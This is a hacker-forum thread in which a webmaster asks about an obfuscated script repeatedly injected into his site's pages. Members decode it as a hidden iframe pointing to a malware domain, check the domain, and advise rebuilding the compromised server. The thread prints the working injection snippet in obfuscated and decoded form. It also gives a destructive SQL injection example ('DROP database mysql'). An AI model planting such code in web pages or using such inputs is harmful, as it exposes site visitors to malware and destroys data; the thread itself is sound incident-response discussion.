Jump to content


Photo
* * * * * 1 votes

Has anyone seen this script before?


  • Please log in to reply
9 replies to this topic

#1 Paine

Paine

    Will I break 10 posts?

  • Members
  • 4 posts
  • Gender:Male

Posted 17 August 2011 - 07:29 PM

Maybe this is a stupid question, maybe this is the wrong place for this, or maybe somebody knows and can help me out.

<script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

Ok so being a noob, I'll just lay out what's going on and hope I don't sound any stupider than I am. This script keeps adding itself to all of my index and start php and html scripts. I have no idea how this is happening or how to make it stop. My guess was that it was just a redirect that was being injected somehow into the scripts. The odd thing is that it's very inconsistent as to when it's happening, at one point after I removed the scripts and replaced them with clean ones, it happened after 20 minutes. Another time it took as long as 23 hours. It hasn't affected any other files than the index and start files, so it's being selective I just don't know why it keeps happening. If you can help me out, I'd appreciate it, or maybe I've just helped you out by giving you a great new script that will help you take over the world. Either way.

-P

#2 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 18 August 2011 - 12:03 AM

<script>
var ip=document.createElement(iframe);
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute(src,hxxp://zirycatum.com/k985ytv.htm);
document.body.appendChild(ip);
</script>


Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...

Edited by serrath, 18 August 2011 - 12:03 AM.


#3 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 19 August 2011 - 06:09 PM

<script>
var ip=document.createElement(iframe);
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute(src,hxxp://zirycatum.com/k985ytv.htm);
document.body.appendChild(ip);
</script>


Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...



whengoing to zirycatum.com it gives me:

403 Forbidden

nginx




dns records:

Site http://zirycatum.com Last reboot unknown Uptime graph
Domain zirycatum.com Netblock owner Spenelli Media Inc.
IP address 178.17.163.92 Site rank unknown
Country MD Nameserver ns1.zirycatum.com
Date first seen unknown DNS admin hostmaster@zirycatum.com
Domain Registrar unknown Reverse DNS 178-17-163-92.static-host.net
Organisation unknown Nameserver Organisation unknown



the actual link has no data. its just a blank page. most likely formerly hosting malware.

#4 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 19 August 2011 - 10:52 PM

Brave soul.

#5 Paine

Paine

    Will I break 10 posts?

  • Members
  • 4 posts
  • Gender:Male

Posted 20 August 2011 - 05:14 PM

Wow, thanks guys. I was kind of thinking that's what it was, but I've never seen anything like that before so I couldn't make heads or tails of it.
Again thanks

-P

#6 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 23 August 2011 - 09:04 AM

Nice bit of obstifucation.

When you say "adds itself to my index page" do you mean if you pull up the index. file in a text editor the above code appears in it? if so, your server is backdoored somehow by a process that has write permissions to those files and until you fix the hole, its just going to keep popping back to insert its edits.

If you say what software stack (eg lamp, samp etc) you are using and what version (but don't reveal your url, or some may actively help you notice the problem by p0wnage, this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

Or someone could have just broke into one of the network daemons the oldschool way and have rootkitted it...

#7 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 23 August 2011 - 03:22 PM

Brave soul.



I opened the page in a sandboxed web browser..safe enough. especially since the computer isnt mine ;P

#8 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 24 August 2011 - 03:50 AM

wget with the UA string set to the most exploitable version of IE you can think of is pretty useful too. Its interesting switching the UA round versions and between IE and firefox and getting different payloads too.

#9 Paine

Paine

    Will I break 10 posts?

  • Members
  • 4 posts
  • Gender:Male

Posted 24 August 2011 - 07:16 AM

Nice bit of obstifucation.

When you say "adds itself to my index page" do you mean if you pull up the index. file in a text editor the above code appears in it? if so, your server is backdoored somehow by a process that has write permissions to those files and until you fix the hole, its just going to keep popping back to insert its edits.

If you say what software stack (eg lamp, samp etc) you are using and what version (but don't reveal your url, or some may actively help you notice the problem by p0wnage, this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

Or someone could have just broke into one of the network daemons the oldschool way and have rootkitted it...

Yes, sorry I guess I forgot to put that in. When I open the file in a text editor I found the script added in at the bottom of the page. My guess was it was an injection of some kind or another. Although I'm not really sure I understand how those work lol. I guess we're running lamp, and the only version I can remember is php5, in on centOS with WHM on there too if that helps. After basically just messing with a few things (this is how do everything, I never actually know what I'm doing till at least the third time, yeah I'm a noob) I found that the perms on the php and html left them open to user modification. I turned that off and it stopped happening.

#10 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 06 September 2011 - 08:03 AM

Warning, Caution, Mayday! Don't put anything you value any degree of confidentiality with on that server as is.

While thats generally a good rule for any internet facing webserver if possible, someone has managed to get filesystem level access to that web server and you have no way of knowing what else they changed when they had that.
They could have left other processes and backdoors on the system sleeping, and while you've closed the automated spambot injecting one, they could be popping back to see if theres any information they could harvest manually that could generate money for them, or be using it as a attack launchpad in some undetectable to you and your current toolkits level. There's a whole genre of software designed to be installed post hacking by the hackers to enable them to keep a level of control over it. Google rootkit. Or invisible rootkit. Or read round here.

Seriously, treat it as still completely compromised because as far as you know it still is. If something gets broken into, the content you generate should be backed up and the whole server nuked and reinstalled then patched against whatever you find before it goes back onto the internet. If its a virtual server, they can probably reimage in minutes, and you can get exclusive access to make your config changes via an alternative ip. Depends on how receptive the hosting company is. Two of mine are great, and the third doesnt give a s*** and won't assist even with security stuff they have caused which the fix on would be to their benefit. Maybe thats why they are a 1/4 the price, so I just use that box for low importance hosting of bulk volume stuff.

I run tripwire on the servers I care about lots amongst various other monitoring tools, and I can check whats been altered if they get attacked because it takes a cryptographic sum of the entire machine less a few directories which change often and dont hold binaries or config. And even if I ran the checksum check post successful intrusion as identified by other monitoring tools on there, I'd still pull that server from service and nuke it from orbit.

For the sql injection, basically a simplified summary is typically the webserver takes in post data from a form somehow, say a search box or username etc. And it doesn't check for unsafe char's in the input or overlong data lengths, or source of post (some mad fools do their sanitization in javascript client side, in which case its trivial to just make a new page up with their parameter names in and bypass every control or safety measure they put in).
The server hands this data off to the sql server, which starts parsing through the data. So lets give a simple example. Some of this syntax might be a bit wobbly because I'm writing it off the top of my head but it outlines the general act.
A username box is entered with "'; DROP database mysql;", and posted to your webserver. The webserver hands it to mysql, which comes along and parses the name contents, which ends up as a DROP DATABASE command once the first ` closes the original query. If your webserver is running with full priv over your mysql database, it could result in instant complete deletion. Of course most attackers don't want to make a noise, so instead its more common to do a select * and attempt to extract information stored in there with the same method, or inject new users in to connect with etc. Ive seen this work against commercial products so don't feel too ashamed if you find it too. Most of the open source forums etc are fairly well tested by now, but they do have the occasional vuln identified so its always good practice to stay with as new a version as you can with them, ditto for the rest of your software stack if you have any control over it.
Not many people would blow a 0 day on a forum about donkey saving or something, its mostly known exploits months or years old for that level.


Bit of a learning curve to take all the above in quickly and understand it, but you'll get there if you want to.




BinRev is hosted by the great people at Lunarpages!